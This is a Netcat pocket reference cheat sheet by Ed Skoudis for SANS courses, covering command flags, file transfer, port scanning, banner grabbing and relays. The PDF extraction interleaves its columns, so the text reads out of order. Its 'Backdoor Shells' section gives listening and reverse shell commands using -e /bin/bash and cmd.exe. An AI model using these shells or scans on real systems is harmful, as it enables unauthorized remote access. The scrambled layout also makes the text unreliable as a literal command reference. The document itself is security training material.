Netcat Relays on Windows Netcat Command Flags

Netcat
To start, enter a temporary directory where we will $ nc [options] [TargetIPaddr] [port(s)]
Cheat Sheet
create .bat files: By Ed Skoudis
C:\> cd c:\temp The [TargetIPaddr] is simply the other side’s IP
POCKET REFERENCE GUIDE
address or domain name. It is required in client mode
Listener-to-Client Relay: of course (because we have to tell the client where to http://www.sans.org
C:\> echo nc [TargetIPaddr] [port] > connect), and is optional in listen mode.
relay.bat
C:\> nc –l –p [LocalPort] –e relay.bat -l: Listen mode (default is client mode) Purpose
-L: Listen harder (supported only on Windows This cheat sheet provides various tips for
Create a relay that sends packets from the local port version of Netcat). This option makes Netcat a using Netcat on both Linux and Unix,
[LocalPort] to a Netcat Client connected to persistent listener which starts listening again specifically tailored to the SANS 504, 517,
[TargetIPaddr] on port [port] after a client disconnects and 560 courses. All syntax is designed for
-u: UDP mode (default is TCP) the original Netcat versions, released by
-p: Local port (In listen mode, this is port listened Hobbit and Weld Pond. The syntax here
Listener-to-Listener Relay: on. In client mode, this is source port for all can be adapted for other Netcats, including
C:\> echo nc –l –p [LocalPort_2] > packets sent) ncat, gnu Netcat, and others.
relay.bat -e: Program to execute after connection occurs,
C:\> nc –l –p [LocalPort_1] –e
connecting STDIN and STDOUT to the
relay.bat Fundamentals
program
-n: Don’t perform DNS lookups on names of
Create a relay that will send packets from any Fundamental Netcat Client:
machines on the other side
connection on [LocalPort_1] to any connection $ nc [TargetIPaddr] [port]
-z: Zero-I/O mode (Don’t send any data, just emit
on [LocalPort_2] a packet without payload)
Connect to an arbitrary port [port] at IP Address
-wN: Timeout for connects, waits for N seconds [TargetIPaddr]
after closure of STDIN. A Netcat client or
Client-to-Client Relay:
listener with this option will wait for N seconds
C:\> echo nc [NextHopIPaddr] [port2] > Fundamental Netcat Listener:
relay.bat to make a connection. If the connection $ nc –l -p [LocalPort]
C:\> nc [PreviousHopIPaddr] [port] –e doesn’t happen in that time, Netcat stops
relay.bat running.
Create a Netcat listener on arbitrary local port
-v: Be verbose, printing out messages on [LocalPort]
Create a relay that will send packets from the Standard Error, such as when a connection
connection to [PreviousHopIPaddr] on port occurs Both the client and listener take input from STDIN
[port] to a Netcat Client connected to -vv: Be very verbose, printing even more details and send data received from the network to STDOUT
on Standard Error
[NextHopIPaddr] on port [port2]
 File Transfer TCP Banner Grabber Netcat Relays on Linux

Grab the banner of any TCP service running on an IP To start, create a FIFO (named pipe) called
Push a file from client to listener:
$ nc –l -p [LocalPort] > [outfile] Address from Linux: backpipe:
$ echo "" | nc –v –n –w1 [TargetIPaddr] $ cd /tmp
[start_port]-[end_port] $ mknod backpipe p
Listen on [LocalPort], store results in [outfile]

$ nc –w3 [TargetIPaddr] [port] < Attempt to connect to each port in a range from
[infile] [end_port] to [start_port] on IP Address Listener-to-Client Relay:
$ nc –l –p [LocalPort] 0<backpipe | nc
[TargetIPaddr] running verbosely (-v), not [TargetIPaddr] [port] | tee backpipe
Push [infile] to [TargetIPaddr] on [port] resolving names (-n), and waiting no more than 1
second for a connection to occur (-w1). Then send a Create a relay that sends packets from the local port
Pull file from listener back to client: blank string to the open port and print out any [LocalPort] to a Netcat client connected to
$ nc –l -p [LocalPort] < [infile] banner received in response
[TargetIPaddr] on port [port]
Listen on [LocalPort], prep to push [infile] Add –r to randomize destination ports within the
range Listener-to-Listener Relay:
$ nc –w3 [TargetIPaddr] [port] >
$ nc –l –p [LocalPort_1] 0<backpipe |
[outfile] Add –p [port] to specify a source port for the nc –l –p [LocalPort_2] | tee backpipe
scan
Connect to [TargetIPaddr] on [port] and
Backdoor Shells Create a relay that sends packets from any
retrieve [outfile] connection on [LocalPort_1] to any connection
Listening backdoor shell on Linux: on [LocalPort_2]
TCP Port Scanner $ nc –l –p [LocalPort] –e /bin/bash
Listening backdoor shell on Windows:
Port scan an IP Address: C:\> nc –l –p [LocalPort] –e cmd.exe
$ nc –v –n –z –w1 [TargetIPaddr] Client-to-Client Relay:
[start_port]-[end_port] $ nc [PreviousHopIPaddr] [port]
Create a shell on local port [LocalPort] that can 0<backpipe | nc [NextHopIPaddr]
then be accessed using a fundamental Netcat client [port2] | tee backpipe
Attempt to connect to each port in a range from
[end_port] to [start_port] on IP Address
Reverse backdoor shell on Linux: Create a relay that sends packets from the
[TargetIPaddr] running verbosely (-v on Linux, - $ nc [YourIPaddr] [port] –e /bin/bash connection to [PreviousHopIPaddr] on port
vv on Windows), not resolving names (-n), without Reverse backdoor shell on Windows: [port] to a Netcat client connected to
sending any data (-z), and waiting no more than 1 C:\> nc [YourIPaddr] [port] –e cmd.exe [NextHopIPaddr] on port [port2]
second for a connection to occur (-w1)
Create a reverse shell that will attempt to connect to
The randomize ports (-r) switch can be used to [YourIPaddr] on local port [port]. This shell
choose port numbers randomly in the range can then be captured using a fundamental nc listener